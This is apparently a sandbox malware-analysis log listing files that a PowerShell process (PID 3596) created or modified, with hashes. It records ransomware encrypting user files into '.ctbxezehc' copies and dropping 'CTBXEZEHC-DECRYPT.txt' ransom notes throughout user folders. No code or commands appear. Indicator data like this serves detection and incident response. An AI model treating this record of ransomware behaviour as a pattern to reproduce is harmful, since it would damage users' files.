SHA256: 415503ad5ccf416666e279a45ed2b2dadf7cbe0169fae62b37b04cba6c0e818b
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
text
MD5: bfd3fed9b65714ea515b08822a73479c
SHA256: ece499aa1b843c0a50056fb65f61fef48cd1f7d6927c38a4e660407d2e171241
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][2].txt
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][2].txt
text
MD5: 61dd65f92c01c3e41fec306cea592e4e
SHA256: 2ca243eeb453e5a1547afec2aa7be31443e5552d00a25c72301d41293ee75023
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][2].txt
text
MD5: 2a18fa526700b07511a9721653f36b27
SHA256: 7c4f110132516b36f63306915abc4456d024e3461dd305be376e17ebc962df72
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
binary
MD5: 08869946305f946e350bdd24b381c7af
SHA256: 79233caa99d95f72de4e5f2b6c91a60d9c11da64b1de6e942990c916df25ba9c
3596
powershell.exe
C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
compressed
MD5: a902cf373e02f7dc34f456ed7449279c
SHA256: ea0c12aedea644678014991a96534145e85aa12cd8955396dfdc98a4fc96f0d5
3596
powershell.exe
C:\Users\admin\AppData\Local\Temp\TarA056.tmp
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Local\Temp\CabA055.tmp
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Local\Temp\Tar9F89.tmp
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Local\Temp\Cab9F88.tmp
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Local\Temp\Tar9F77.tmp
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Local\Temp\Cab9F76.tmp
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
text
MD5: 781623bcc4f50e8aa21c9325fea77bc9
SHA256: f98fc88f457ece0609219b8463897010cb110d9208c1580fa2fe16bb6b4bb9eb
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
text
MD5: 9e1d55e07d822255053efad9c2800d31
SHA256: 1f0438d3f92ce1218c992f1e55df97e637b8fbf199a0bd47bc4e7675eef384ad
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
text
MD5: 56b4ec35bf89566c358db45e6924f78b
SHA256: ae7d6ef55045c579b9d6395af91f16c5e05361287f12c64fd6f738154811e7b1
3596
powershell.exe
C:\Users\admin\AppData\Local\Temp\pidor.bmp
image
MD5: 5862fecf0bfed2c21450fbfcec77bdb6
SHA256: d4804e66c77abee25d9a4d4afb64cd63981408c5fc18e1d42b80f7d59c2afc01
3596
powershell.exe
C:\Users\Public\Videos\Sample Videos\Wildlife.wmv.ctbxezehc
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\Public\Videos\Sample Videos\Wildlife.wmv
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\Public\Videos\Sample Videos\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\Public\Recorded TV\Sample Media\win7_scenic-demoshort_raw.wtv.ctbxezehc
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\Public\Recorded TV\Sample Media\win7_scenic-demoshort_raw.wtv
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\Public\Recorded TV\Sample Media\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\Public\Recorded TV\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Tulips.jpg.ctbxezehc
binary
MD5: ff844462d07bf588a7d679261c31b3fa
SHA256: 6ade8bf5f3c95abfe601eef2df0502af75a9a903ae2c0a2c49440628c69dc289
3596
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Penguins.jpg.ctbxezehc
binary
MD5: 549e342263163423683e146a866d6841
SHA256: 09f193c943df19b38715e95021b59bc7cc89f53689e0113a854f83c4512310e5
3596
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Tulips.jpg
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Penguins.jpg
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Lighthouse.jpg.ctbxezehc
binary
MD5: 91db7751cdcbe3962e19465527d7156e
SHA256: aed7e82d9e806c9f2ba1260119e5ae9c7dfb771fa43cc5dd3d331a79a2dfdf65
3596
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Koala.jpg.ctbxezehc
binary
MD5: 9a934abd965880675a8b4069cbc77da6
SHA256: 817e600ab1b1da6a4b7536ab1359e85af018c301704e74ca3aa22b5f72bbdf0d
3596
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Lighthouse.jpg
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Koala.jpg
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Jellyfish.jpg.ctbxezehc
binary
MD5: b89daa85f58e2987982086b4aaee5336
SHA256: ef40228e93c5d4fc89043f2fa58bfdf2d2799799a835291eac38fc65986a0d8a
3596
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Jellyfish.jpg
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Hydrangeas.jpg.ctbxezehc
binary
MD5: 9a5206754bec16f4e99526089f6201de
SHA256: 0803d4b7467dee6aa9a4fe626648db7bc1efac18907f2c33c6bcb2535f06c9d3
3596
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Hydrangeas.jpg
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Desert.jpg.ctbxezehc
binary
MD5: 2db8f1280357d987dbcb8ce5f5a6ddea
SHA256: 8bf5c01f369b8093b3e848ce50ef395a39971f177f07a33d94b6c21f1628bea3
3596
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Desert.jpg
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg.ctbxezehc
binary
MD5: 61e03c4f428870d06e7749774be97085
SHA256: 4efce452a2abba6c1b18a77c6402ee41bf585cb188d72704b32b989f33afe7b8
3596
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\Public\Music\Sample Music\Sleep Away.mp3
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\Public\Music\Sample Music\Sleep Away.mp3.ctbxezehc
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\Public\Music\Sample Music\Maid with the Flaxen Hair.mp3.ctbxezehc
binary
MD5: c164bae62343173adfc14b9bfe7eeaba
SHA256: 49997304c208abac80ce2003a962776f88f22a8a18442f4db9930078bc761396
3596
powershell.exe
C:\Users\Public\Music\Sample Music\Maid with the Flaxen Hair.mp3
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\Public\Music\Sample Music\Kalimba.mp3
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\Public\Music\Sample Music\Kalimba.mp3.ctbxezehc
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\Public\Libraries\RecordedTV.library-ms.ctbxezehc
binary
MD5: e9b4139ab1a4c0abf1b2f431b1422278
SHA256: 81ee4111a77a36dc46ce3ee85d61a0cef4d0ab05893bcaef9139305f95a04dd1
3596
powershell.exe
C:\Users\Public\Music\Sample Music\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\Public\Libraries\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\Public\Libraries\RecordedTV.library-ms
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\Public\Favorites\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\Public\Downloads\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\Public\Music\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\Public\Pictures\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\Public\Videos\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\Public\Documents\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\Public\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Templates\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\Saved Games\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\Pictures\xmlsecure.jpg.ctbxezehc
binary
MD5: 848ad98f86c6b540164468819d58d07b
SHA256: 1a1c6bb6b1498ac56d264b65f0e859244639a3ab3e059c4bb5df9e2a35fd8bdd
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\Searches\Microsoft OneNote.searchconnector-ms.ctbxezehc
binary
MD5: 66178a79502ff00d8b949272fd2c8512
SHA256: 71f422c732b7e0fbd2676776ae09bbb4fa53c20c9e2073125d52692a3fa9d0d8
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\Searches\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\Searches\Microsoft Outlook.searchconnector-ms.ctbxezehc
binary
MD5: 386a25f77780663200cfdbe6f1867a2c
SHA256: 6877bfab103b3108fb4ac493f6f3ac25b361ad89768369da44e0d5498ec65996
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\SendTo\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\Pictures\xmlsecure.jpg
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\Searches\Microsoft Outlook.searchconnector-ms
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\Searches\Microsoft OneNote.searchconnector-ms
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\Pictures\reportsliterature.png.ctbxezehc
binary
MD5: 6927f7ce18b9fb981e451c2920871c17
SHA256: f156960c245a4c3177e4d745e522d5f34d5fa251a78a901a004e5fe63f6981a6
3596
powershell.exe
C:\Users\admin\Pictures\particularlymedical.png.ctbxezehc
binary
MD5: 1231151810c410164cc12122a3493344
SHA256: f7e93ffdd0adf457918172df18f5385f20cbf26907ced1faff3e6bea976e150e
3596
powershell.exe
C:\Users\admin\Pictures\wartitle.png.ctbxezehc
binary
MD5: d948d25e0f9f7929371a93b80f8aeaf1
SHA256: 0fc9b44c8b2f0eab5451c9218edcbf11b5b7cf7f1c0c4786df867ffe6bd184c5
3596
powershell.exe
C:\Users\admin\Pictures\wartitle.png
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\Pictures\reportsliterature.png
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\Pictures\particularlymedical.png
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\Pictures\joblists.jpg.ctbxezehc
binary
MD5: cdfbfb70dc7adc0eafc5e14ce7e549c1
SHA256: f6643503b2bd0baf1327e8a170586a705837e1a8ca1e9e8e3a15290c25eb83c3
3596
powershell.exe
C:\Users\admin\ntuser.ini.ctbxezehc
binary
MD5: 2d45fecc8c32cd1a36453d2c187c78e3
SHA256: 227210f7c8b777a19ae854576327b4d1150d0cc14004d3f269d9d14b91fe3735
3596
powershell.exe
C:\Users\admin\Pictures\modifiedsociety.png.ctbxezehc
binary
MD5: 2de698fe9802d3c088c7139994abaac0
SHA256: df444ff151b38e35f197ed96ced77341716f2c9017bf43f05fa9326da9194cf8
3596
powershell.exe
C:\Users\admin\Pictures\modifiedsociety.png
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\Pictures\joblists.jpg
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Network Shortcuts\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\ntuser.ini
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\Links\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\Favorites\Windows Live\Windows Live Spaces.url.ctbxezehc
binary
MD5: 9cdb8d990a6504c8b9aa9b4a246c55cd
SHA256: 6ec85c6df53284cff79e75408efb5d723fd070cb1c60e64f923cab43f28d7ed4
3596
powershell.exe
C:\Users\admin\Favorites\Windows Live\Windows Live Spaces.url
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\Favorites\Windows Live\Windows Live Gallery.url.ctbxezehc
binary
MD5: fcf4027ad1eaa07feee4b7056070662b
SHA256: de8ebfcfa2dd6ac21ead890c8b8e27f83eec850d385fa3fc790e97306325b38c
3596
powershell.exe
C:\Users\admin\Favorites\Windows Live\Windows Live Mail.url.ctbxezehc
binary
MD5: a8cbea1ed108106619dea912dc4426c9
SHA256: e80102980cc006cb7dae0c65e4da24e31a9c25667fb491cbb185cbaf3fb982b0
3596
powershell.exe
C:\Users\admin\Favorites\Windows Live\Windows Live Mail.url
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\Favorites\Windows Live\Windows Live Gallery.url
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\Favorites\Windows Live\Get Windows Live.url.ctbxezehc
binary
MD5: ae5e88af7f8b2789139ea6bbe6547e6e
SHA256: fd133cdb842e2e4225bfd7d972f96d7e3fb5be63ee63ab694c4b3767baacfa30
3596
powershell.exe
C:\Users\admin\Favorites\Windows Live\Get Windows Live.url
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\Favorites\MSN Websites\MSNBC News.url.ctbxezehc
binary
MD5: 56f93ff4d0e8f37429fbdaab813f0f5b
SHA256: 5855ca9986719a1bfd31f09a636d9db5cdc451d63a3c18bf57c80907900b8a33
3596
powershell.exe
C:\Users\admin\Favorites\MSN Websites\MSN.url.ctbxezehc
binary
MD5: 694c0c969f22d869cdc7c6f42280b8e8
SHA256: daffb886e48a395d7e7547adbd97016270a9d834205d9500b0bf7c507c8b7d26
3596
powershell.exe
C:\Users\admin\Favorites\Windows Live\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\Favorites\MSN Websites\MSNBC News.url
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\Favorites\MSN Websites\MSN Sports.url.ctbxezehc
binary
MD5: 8abf1db365bc8191c0ae5b5db1926a77
SHA256: fb5a718effee6f7aa90b08302ae042c72d03f7a6223f603c0017879ade3f86a7
3596
powershell.exe
C:\Users\admin\Favorites\MSN Websites\MSN Money.url.ctbxezehc
binary
MD5: 49d526826dfd685df6e5677c4bfe24bc
SHA256: ad819349e55b4847a33486e83b869e2a3eca4b46e325a3e8e921e3befb7c43cb
3596
powershell.exe
C:\Users\admin\Favorites\MSN Websites\MSN Sports.url
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\Favorites\MSN Websites\MSN.url
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\Favorites\MSN Websites\MSN Entertainment.url.ctbxezehc
binary
MD5: 259f8749a7d73ae015af2a413a7057c5
SHA256: 753b0c486349c3edba9bc61aba1880dec930ff30ff0cfdae68f1cc2aa6e1f7c2
3596
powershell.exe
C:\Users\admin\Favorites\MSN Websites\MSN Entertainment.url
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\Favorites\MSN Websites\MSN Money.url
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\Favorites\Microsoft Websites\Microsoft Store.url.ctbxezehc
binary
MD5: a04a524e21f09b47abb8dd1c10ea2e10
SHA256: c2584c5f970d259588b7820f0754d34c4f549667cf2874bff3d0ce3fc0f42a76
3596
powershell.exe
C:\Users\admin\Favorites\MSN Websites\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\Favorites\MSN Websites\MSN Autos.url.ctbxezehc
binary
MD5: 8ae84faccf8e037990349f22ba7ae14a
SHA256: 29bae64e5a243cd2f8d7b1c97bdb9060b3ca2e1329865b37669b89b52d51096c
3596
powershell.exe
C:\Users\admin\Favorites\MSN Websites\MSN Autos.url
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\Favorites\Microsoft Websites\Microsoft Store.url
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\Favorites\Microsoft Websites\Microsoft At Work.url.ctbxezehc
binary
MD5: 61ea8e52fd80adaa00e18d4cf6e80726
SHA256: c3c72cb098aa65cbdcf823db2632206362201a0a5ece7892437aa483d3051541
3596
powershell.exe
C:\Users\admin\Favorites\Microsoft Websites\IE site on Microsoft.com.url.ctbxezehc
binary
MD5: 7f0416987e0fc54dfd9f8efd3f37975b
SHA256: aa1f7deda0701d65e2ff0c75bc3822c63c11a86dbb5d3afc145fe99bfb8128ab
3596
powershell.exe
C:\Users\admin\Favorites\Microsoft Websites\Microsoft At Home.url.ctbxezehc
binary
MD5: 536f1f00f1759aa39dba34ffc19aa07a
SHA256: 00e395a76f9438cf3cdfa915fcca36acfa680a386919477cc1e274e32e6ab5c4
3596
powershell.exe
binary
MD5: 36ae4215aeacf384ac0c4d85a6626590
SHA256: e923c7e9237ad6bfa2add168bc6fedc0297ef2b6276473d98c253dee4e33efff
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Monokai.xml
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Mono Industrial.xml.ctbxezehc
binary
MD5: 8cc2778cb10d4451e5a01516a82e3d52
SHA256: 7ce354275dd5433a8c700f64a6144b6544b9ee7293953c5d3f4b96d7a9c741f0
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Mono Industrial.xml
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\khaki.xml.ctbxezehc
binary
MD5: 58ac9efcae224bd8bee94650648b93cc
SHA256: 67793bd872f4a0ed8a0154f9bf9e21b8673362e5e664dbb075d1d0ca5c0e9f31
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\khaki.xml
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\HotFudgeSundae.xml.ctbxezehc
binary
MD5: 0e9b7addd221cc9a26fbe8ad6d1d7288
SHA256: 1ec7aba0b52c1ebbe84037373c92926dd1cf35f3b0d8b23ac5607bdf169b7a26
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\HotFudgeSundae.xml
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Hello Kitty.xml.ctbxezehc
binary
MD5: 6b49d4b68751567993dcd5948c0a32d4
SHA256: 5327fb9410361f1d5470a8aab774b2fe3c39f24b88361de2db2d36e257ee03ee
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Hello Kitty.xml
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Deep Black.xml.ctbxezehc
binary
MD5: 14b2f19b8549a237a9ccc13f81ddc72b
SHA256: ed13863e6560797134a6b4312017a60bf50212e52eecdee7ddff85ec7302395c
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Deep Black.xml
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Choco.xml.ctbxezehc
binary
MD5: 08b63d9c3bfe3b30743fc11f57e4a31b
SHA256: 1f277b2e803721f109ce51cc3f4bc18a6142ffba7e93fdf849187cdad5392d28
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Choco.xml
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Black board.xml.ctbxezehc
binary
MD5: a9655bcd3bf4eaa2c8bb94ecfe2c26ce
SHA256: c6749adaf1078350568c4a630eac741e8ccc365f1214c07391c609ff3a893ded
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Black board.xml
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Bespin.xml.ctbxezehc
binary
MD5: 20525df0e843c5dbb2722f61f936967a
SHA256: 64714ca81304341c4924952b406a64cb657d412d861440a0b755a05aaaecca3f
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Bespin.xml
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\plugins\config\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\plugins\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\functionList.xml.ctbxezehc
binary
MD5: 1ed878750e47caed0f28e2a9cbf1c209
SHA256: 246a2149bdbef4154cf83cf4efb6ea2309cc3f8510217f202551be7bde131c17
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\functionList.xml
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\SystemExtensionsDev\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\contextMenu.xml.ctbxezehc
binary
MD5: 4f1fd714fb3c4d8c9a31dc6c70b1a7d0
SHA256: 64deea5d9e295d9ebda55c94c94abc38a1e3fbcc1e11c943ad979887d8023aa8
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\profiles.ini.ctbxezehc
binary
MD5: c5d379289de1937cbc10601d73df7244
SHA256: 638def73771a07f456b28f9a8faaf8c907dd208720ad4e6212f5597638de0a45
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\contextMenu.xml
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\profiles.ini
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\xulstore.json.ctbxezehc
binary
MD5: 59ffbaf2cf3bd3b62a40a3f26be79e1d
SHA256: 6f70cc4f8701137ca6fb5244327af98ddff161cb4ed4d483aa5857bfb78ebd9a
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\xulstore.json
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\webappsstore.sqlite.ctbxezehc
binary
MD5: e3cfff9ca4c2e30c8c59f3e2704b013e
SHA256: 6042f41312db5a1a68a142bbee11bc9f2176ee8353f54868479c01468b78d062
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\webappsstore.sqlite
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\weave\toFetch\tabs.json.ctbxezehc
binary
MD5: c1608fdd708d39dc30125400fe429fcd
SHA256: 5286150b5da134f97673a60bcd2fccffd8e730d981b6ea3e833670c9b0551bb8
3596
powershell.exe
